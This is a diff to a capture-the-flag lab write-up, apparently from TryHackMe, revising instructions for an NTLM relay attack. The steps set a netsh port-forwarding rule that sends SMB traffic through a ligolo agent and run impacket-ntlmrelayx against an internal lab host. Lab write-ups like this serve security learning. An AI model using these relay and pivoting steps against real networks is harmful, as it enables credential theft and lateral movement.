zinzloun/THM_WriteUP/README.md

     netstat -an | findstr :445

-Should return nothing.
-If you find that a service is still running probably is due to a firewall port forwarding rule left active from other user (e.g using meterpreter).
-Check it out with:
+Should return nothing. <b>If you find (like me) that a service is still running on port 445, probably is due to a firewall port forwarding rule left active from other user (e.g using meterpreter port forward).</b> Check it out with:

     netsh interface portproxy show all
-Check the clean up section on how to delete a rule.
+Check the clean up section on how to delete such rules.

-At this point I set a portforwarding rule in PC-FILESRV01 to forward incoming SMB traffic to the agent (see the above listener).
+At this point I set a portforwarding rule in PC-FILESRV01 to forward incoming SMB traffic to the agent, according to the previous listener we set.

     netsh interface portproxy add v4tov4 listenport=445 listenaddress=10.200.95.35 connectport=445 connectaddress=10.200.95.33

-So the flow we set up is:
+So the whole SMB flow we set up is:

-    Incoming SMB req. to PC-FILESRV01 --> FW rules forwards the request to ligolol agent (10.200.95.33) listener (445) --> the listener forward SMB request to our attacker machine
+    Incoming SMB request to PC-FILESRV01 --> FW rules forwards the request to ligolol agent (10.200.95.33) listener (445) --> the listener forward SMB request to our attacker machine

-Now on our attacker machine start the relay listener
+Now on our attacker machine starts the relay listener:

     impacket-ntlmrelayx -t smb://10.200.95.30 -smb2support -socks